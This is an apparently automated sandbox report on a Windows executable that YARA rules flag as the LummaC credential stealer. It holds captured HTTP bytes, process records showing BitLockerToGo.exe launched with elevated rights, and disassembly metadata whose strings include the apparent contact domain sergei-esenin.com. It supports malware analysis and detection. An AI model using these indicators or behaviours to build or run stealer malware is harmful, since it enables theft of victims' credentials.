2024-10-13 19:34:57 UTC	1369	IN	Data Raw: 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ss-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-13 19:34:57 UTC	895	IN	Data Raw: 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 Data Ascii: span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing"
2024-10-13 19:34:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:34:42
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe"
Imagebase:	0x920000
File size:	32'150'017 bytes
MD5 hash:	2E1E5DF2401546676205BEFE6668ED88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1722084290.00000000021A3000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1695494389.000000000205A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1722084290.000000000205A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:34:51
Start date:	13/10/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x680000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	48.1%
Total number of Nodes:	108
Total number of Limit Nodes:	14

Executed Functions

Function 026CB810 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 601
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\"Y , xrefs: 026CBC62
QQ!., xrefs: 026CBC5A
653837E8A718FF4A7AE0C905BA10706C, xrefs: 026CBD7A
C6T&, xrefs: 026CBC4A
sergei-esenin.com, xrefs: 026CBD3F, 026CBF96
Z.^^, xrefs: 026CBC52

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 653837E8A718FF4A7AE0C905BA10706C$C6T&$QQ!.$Z.^^$\"Y $sergei-esenin.com
API String ID: 0-800291984
Opcode ID: af1a3c02e18015a3e1303d3f58907fc850f0b7a868146ad6eb24fe9c6df4d552
Instruction ID: 3019e735c8ec6538c3436b578d5a7e6777e1db4eef000d3e6298bb55925a1d99
Opcode Fuzzy Hash: af1a3c02e18015a3e1303d3f58907fc850f0b7a868146ad6eb24fe9c6df4d552
Instruction Fuzzy Hash: 1D12E2B05083808FD710AF14D8917BEBBE1EF96308F288A2CE5D55B392D7768519CF96

Function 026CCC80 Relevance: 14.6, Strings: 11, Instructions: 842
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_=U?, xrefs: 026CCDFE
p~, xrefs: 026CD200
;I+K, xrefs: 026CCE77
[u#w, xrefs: 026CCE98
5Q}S, xrefs: 026CCE35
C-C/, xrefs: 026CCE2A
+y-{, xrefs: 026CCEA3
sergei-esenin.com, xrefs: 026CD811
Y1Y3, xrefs: 026CCDDD
*M/O, xrefs: 026CCE82
6abc, xrefs: 026CCEB9

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *M/O$+y-{$5Q}S$6abc$;I+K$C-C/$Y1Y3$[u#w$_=U?$p~$sergei-esenin.com
API String ID: 0-1859607568
Opcode ID: 71fc6a9f105d38ed7586067291bd0836611c5c4ebaf322567c3a10ba59742aab
Instruction ID: 19b5f9f9b9cb53ba4e44f2becd4155bbacf95db7184b679ceb7d57bac7d077b3
Opcode Fuzzy Hash: 71fc6a9f105d38ed7586067291bd0836611c5c4ebaf322567c3a10ba59742aab
Instruction Fuzzy Hash: 0762A6B0A08345DFD724AF54D890BAFBBB2FF85314F108A2CE59A5B284CB749815CF56

Function 026F681D Relevance: 13.9, APIs: 9, Instructions: 405
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 026F6878
SysAllocString.OLEAUT32 ref: 026F692F
VariantInit.OLEAUT32(?), ref: 026F6998
SysStringLen.OLEAUT32(00000000), ref: 026F6A51

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: String$Alloc$InitVariant
String ID:
API String ID: 3520221836-0
Opcode ID: 2f5563a7a9d532becbf62e7fa4f302ce6af2e2e442c5ea4f36b81d74a826d963
Instruction ID: af535fb53260db875faea2b8003a9373d7230f53553196e81d2abe862fe5ab5d
Opcode Fuzzy Hash: 2f5563a7a9d532becbf62e7fa4f302ce6af2e2e442c5ea4f36b81d74a826d963
Instruction Fuzzy Hash: 2AE18A75600B01CFD728CF28C891B26B7E6FB89314F14896DD6A68BBA1DB35F855CB40

Function 026CC69D Relevance: 7.4, Strings: 5, Instructions: 1154COMMON

Download Yara Rule

Strings

p~, xrefs: 026CD200
:6, xrefs: 026CC73B
#:, xrefs: 026CC734
sergei-esenin.com, xrefs: 026CD811
sq, xrefs: 026CC824

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #:$:6$p~$sergei-esenin.com$sq
API String ID: 0-1602847909
Opcode ID: d99d52ba80204291b480f95124e165eb7cadc6ce7ba7fee61af042e66cecf076
Instruction ID: c7be1edc617dd03a0ad611f64e9529d0151ac6cfb80f67467d81809aa9b63752
Opcode Fuzzy Hash: d99d52ba80204291b480f95124e165eb7cadc6ce7ba7fee61af042e66cecf076
Instruction Fuzzy Hash: 5092ECB0A08701DFD714DF65D890B6ABBB1FF89310F148A2CE59697784CB34A825CF86

Function 026F65E0 Relevance: 1.6, APIs: 1, Instructions: 88
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(02701A50,00000000,00000001,02701A40,00000000), ref: 026F6715

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 9fbd6215b3b428a3529eef7b166bca7d7aff99acb5ea8ff58e729769edf0908c
Instruction ID: 4140234a00963fc5a3be84a90f732edb83799d024ca14371a0e6772662651e58
Opcode Fuzzy Hash: 9fbd6215b3b428a3529eef7b166bca7d7aff99acb5ea8ff58e729769edf0908c
Instruction Fuzzy Hash: 873169B4510B009BE334CF26C999B53BBF5EB89714F548A0CE5DB4BA80CBB0B4098F95

Function 026FC800 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(026CEF35,?,00000001,?), ref: 026FC82E

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 026FBC78 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a212b5725485a631ac7f6006890944b5f5b439598524be243f2841a6677cc05
Instruction ID: 0ec4b9cb0023813d7f289f41749cb85298dadd4f4ba3b4f7f5889ab6cc31a680
Opcode Fuzzy Hash: 9a212b5725485a631ac7f6006890944b5f5b439598524be243f2841a6677cc05
Instruction Fuzzy Hash: 79219070C04295CFDB58CFA8C5906BEBBB1AF46201F28859DC59237781D730BA45CBA5

Function 026CA9A0 Relevance: 4.5, APIs: 3, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 026CA9B9
ExitProcess.KERNEL32 ref: 026CAA0C

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Process$CurrentExit
String ID:
API String ID: 2333725396-0
Opcode ID: b155c84095ce6f8db98d0e98d0c3d7e4d6f430610a275a60c32daa2ecbb3bdc4
Instruction ID: 93406dda3307e594416927da7e706848df2555d21d72c2f6b634bb8f490b503f
Opcode Fuzzy Hash: b155c84095ce6f8db98d0e98d0c3d7e4d6f430610a275a60c32daa2ecbb3bdc4
Instruction Fuzzy Hash: 65F05E7182826CC6CA5C3FF59B1B33D3A55EF01245F224A1EED4651140DB354C968A9B

Function 026FC63D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000), ref: 026FC7B5

Strings

bkC, xrefs: 026FC648

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: bkC
API String ID: 1279760036-164674686
Opcode ID: 19ae226a38f55cc7dabcf9d3cb04065b2e92350bdbcb5a358fb693a4d49167c5
Instruction ID: 6fc6cce8834c6fac106c2f83ce05f570a4d87df72b021da4555f01575b135e98
Opcode Fuzzy Hash: 19ae226a38f55cc7dabcf9d3cb04065b2e92350bdbcb5a358fb693a4d49167c5
Instruction Fuzzy Hash: 8F5157B6D141A5DFCB08DFB8E8905AEBB75FF0A305F0548A8D50167345EB306A14CFA5

Function 026F566A Relevance: 3.1, APIs: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 026F566A
GetUserDefaultUILanguage.KERNELBASE ref: 026F569D

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: CurrentDefaultLanguageProcessUser
String ID:
API String ID: 4043730634-0
Opcode ID: bffcd244ccda5aab1ac0713a7ae542f84cccd6b8228def6f15c4f1372b57405d
Instruction ID: 8b09ce5371732e427017ef86d8422f94e451df6d6b44a09248111f91a4657f2f
Opcode Fuzzy Hash: bffcd244ccda5aab1ac0713a7ae542f84cccd6b8228def6f15c4f1372b57405d
Instruction Fuzzy Hash: 84319CB5C052548FCB10AF68EA443AD7FB1AB15305F14489CC989A7342E7708A98CFA3

Function 026F680F Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 026F67E0
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,Function_000367F0), ref: 026F6801

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c4f7c1e99e7f6e212d1033a4307d17c4f51c74108290a5bd966f1196cc49bb39
Instruction ID: 176e18254733d69010c6240ee8128f529bb8f8dd02a955cec8afe4419a2d92bf
Opcode Fuzzy Hash: c4f7c1e99e7f6e212d1033a4307d17c4f51c74108290a5bd966f1196cc49bb39
Instruction Fuzzy Hash: E7E075317D4300FFF2394A50EC67F047665B749F02F204954B7867C4D98AF076258A48

Function 026FC070 Relevance: 1.8, APIs: 1, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7b8b0925370b7a6bc446e7ab2f5dd03d1697e7c9b6946320ed548c912f0eac
Instruction ID: 883174f59be2aa1e8142b0282a879fbc5b15c26372111810d9729c3e511a3f80
Opcode Fuzzy Hash: db7b8b0925370b7a6bc446e7ab2f5dd03d1697e7c9b6946320ed548c912f0eac
Instruction Fuzzy Hash: 71911876D641A4DFCB04AFBCF8941AEB774BF0E352F054CA4C591A7244E7385A26CBA0

Function 026FC696 Relevance: 1.7, APIs: 1, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f4d5b301c3aa33c1ba551d25d457516d19d9d873ae94727b0379211f36fcb1
Instruction ID: abc99d482c45adeb23fe65e380f900a5ebe7fac3f5a678883146f3030fa4b8da
Opcode Fuzzy Hash: 92f4d5b301c3aa33c1ba551d25d457516d19d9d873ae94727b0379211f36fcb1
Instruction Fuzzy Hash: 5E718876D641A4CFCB089FBCE8905BEBB74AF0A311F094CE8D55167241EB346A25CBE0

Function 026F6728 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 026F6798

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 46e7f4e2feb725fa7985b79338eac1ab695ecbf70e9dad5864ac80b89a6a839e
Instruction ID: c47291dcfb923078346ab9c52d42d8d2973fe6746bf6dbcb62d520fbc6b75dc6
Opcode Fuzzy Hash: 46e7f4e2feb725fa7985b79338eac1ab695ecbf70e9dad5864ac80b89a6a839e
Instruction Fuzzy Hash: E01112B0100B819FD374CF2AC498A26BBF1FF49309B609C4DE1D28BA55CB72E446CB54

Function 026FA762 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 026FA76B

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 25dddd8e29cb5de8426bfeabcbd033eddd5a80fa44b23ec91301293144d18368
Instruction ID: 02ecc6858e05a763485a30cc6a8ca260c8c2e1b21974670252f92cf126650e7b
Opcode Fuzzy Hash: 25dddd8e29cb5de8426bfeabcbd033eddd5a80fa44b23ec91301293144d18368
Instruction Fuzzy Hash: C7B01274540980AFEB155F18DC26F307B25FF44708FE048E8F929898F2C6365C36D944

Non-executed Functions

Function 026E5380 Relevance: 40.4, APIs: 2, Strings: 21, Instructions: 182COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 026E53C9
GetSystemMetrics.USER32 ref: 026E53DC

Strings

=, xrefs: 026E57EB
=, xrefs: 026E57BF
=, xrefs: 026E5843
=, xrefs: 026E5767
=, xrefs: 026E5817
=, xrefs: 026E586F
=, xrefs: 026E56F9
=, xrefs: 026E57D5
=, xrefs: 026E5751
=, xrefs: 026E589B
, xrefs: 026E54D2
=, xrefs: 026E5725
=, xrefs: 026E577D
=, xrefs: 026E573B
=, xrefs: 026E57A9
=, xrefs: 026E570F
=, xrefs: 026E5885
=, xrefs: 026E582D
=, xrefs: 026E5793
=, xrefs: 026E5801
=, xrefs: 026E5859

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID: $=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=
API String ID: 4116985748-1924410042
Opcode ID: 93cbab74e56bb408cca58b86420be97993f50a6c32bdf4eaa0c356bcb048874d
Instruction ID: 3895dbd8e47381006f0e17300103dde7a7ed827872007114d1a8000781992932
Opcode Fuzzy Hash: 93cbab74e56bb408cca58b86420be97993f50a6c32bdf4eaa0c356bcb048874d
Instruction Fuzzy Hash: 10C16AB060A380CFD370DF14D29878FBAE8BB85308F91896DA5988B294D774955DCF92

Function 026DE6C0 Relevance: 37.0, Strings: 29, Instructions: 763COMMON

Download Yara Rule

Strings

*m(o, xrefs: 026DEA05
]5X7, xrefs: 026DE96B
1Y6[, xrefs: 026DE9CE
uw, xrefs: 026DF0E8
x:m<, xrefs: 026DF4CE
Q1U3, xrefs: 026DE960
EuEw, xrefs: 026DEA1B
k>h0, xrefs: 026DF4D9
WeQg, xrefs: 026DE9EF
56, xrefs: 026DF4EF
=E5G, xrefs: 026DE997
